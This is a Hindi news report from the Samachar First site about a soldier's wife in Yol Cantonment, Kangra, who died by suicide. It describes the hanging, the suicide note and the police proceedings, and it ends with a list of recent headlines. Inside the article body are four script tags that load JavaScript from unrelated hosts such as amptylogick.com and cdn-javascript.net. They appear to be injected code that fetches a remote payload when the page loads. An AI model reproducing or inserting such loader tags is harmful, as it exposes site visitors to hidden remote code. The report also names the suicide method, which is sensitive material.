कांगड़ाः अज्ञात कारणों से फौजी की पत्नी ने लगाया फंदा

<p>जिला कांगड़ा में धर्मशाला के योल कैंट में फौजी जवान की पत्नी का आत्महत्या करने का मामला सामने आया है। कैंट में फौजी जवान की पत्नी वंदना ने फंदा लगाकर सुसाइड कर लिया। इस घटना की सूचना लगते ही पुलिस मौके पर पहुंची और शव को कब्जे में ले कर पोस्टमार्टम के लिए टांडा मेडिकल कॉलेज भेजा है। जानकारी के अनुसार वीरवार को योल में तैनात सैनिक की पत्नी ने फंदा लगा कर अपनी जान दे दी। मृतका की पहचान वंदना पत्नी अशोक कुमार निवासी उत्तर प्रदेश के रहने वाले हैं। मृतका ने कमरे में पंखे से लटक कर आत्महत्या की है। वंदना अपने पीछे तीन साल की बेटी छोड़ गई है। शव को पहले सैन्य अस्पताल ले जाया गया है और फिर वहां से पोस्टमार्टम के लिए टांडा मेडिकल कॉलेज ले जाया जाएगा। पोस्टमार्टम रिपोर्ट आने के बाद ही मौत के सही कारणों का खुलासा हो पाएगा।</p>

<p>पुलिस को मौके से सुसाइड नोट मिला है, जिसमें वंदना ने लिखा है कि पति खुद का और बेटी का ख्याल रखें। सुसाइड नोट में वंदना किसी पर कोई आरोप नहीं लगाया है। वहीं, मृतका के परिजनों ने भी दामाद पर किसी तरह का आरोप नहीं लगाया है। फिलहाल, सुसाइड के पीछे की वजह का पता नहीं चल पाया है। धर्मशाला सदर थाने के एसएचओ राजेश कुमार ने बताया कि धारा-174 के तहत मामला दर्ज़ किया गया है। पुलिस मामले की जांच कर रही है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1573795631087″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

हर साल मई महीने के दूसरे रविवार को मनाया जाता है मदर्स डे

'मां' की एक दुआ जिन्दगी बना देगी, खुद रोएगी मगर तुम्हें हंसा देगी, कभी भूल…

1 min ago

कांगड़ा घाटी में रेल सुविधा शुरू होने से लोगों में खुशी की लहर

कांगड़ा घाटी में रेल सुविधा शुरू होने से लोगों में खुशी की लहर. पठानकोट-जोगिंद्रनगर रेलवे…

5 mins ago

“माँ……..सूक्ष्म शब्द…….गहन विश्लेषण”

माँ कितना सूक्ष्म शब्द है, पर उसके भीतर छिपी गहराई, विशालता और प्रगाढ़ता कितनी अनंत…

18 hours ago

पांचवीं बार 5 लाख वोटों से जीतेंगे अनुराग ठाकुर: जयराम ठाकुर

हमीरपुर: नेता प्रतिपक्ष जयराम ठाकुर ने हमीरपुर में भाजपा प्रत्याशी अनुराग ठाकुर के समर्थन में आयोजित…

19 hours ago

मंडी: दिव्यांगों को दिया जा रहा प्रशिक्षण

मंडी, 11 मई: हिमालयन दिव्यांग कल्याण संस्था मंडी ने दिव्यांगों व महिलाओं के लिए तीन…

19 hours ago

देश की तस्वीर पीएम मोदी की नीतियों के कारण बदली है: राजीव

गांव, गरीब, वंचित, पीड़ित, दलित, शोषित, युवा और किसान इनकी तस्वीर पीएम मोदी की नीतियों…

19 hours ago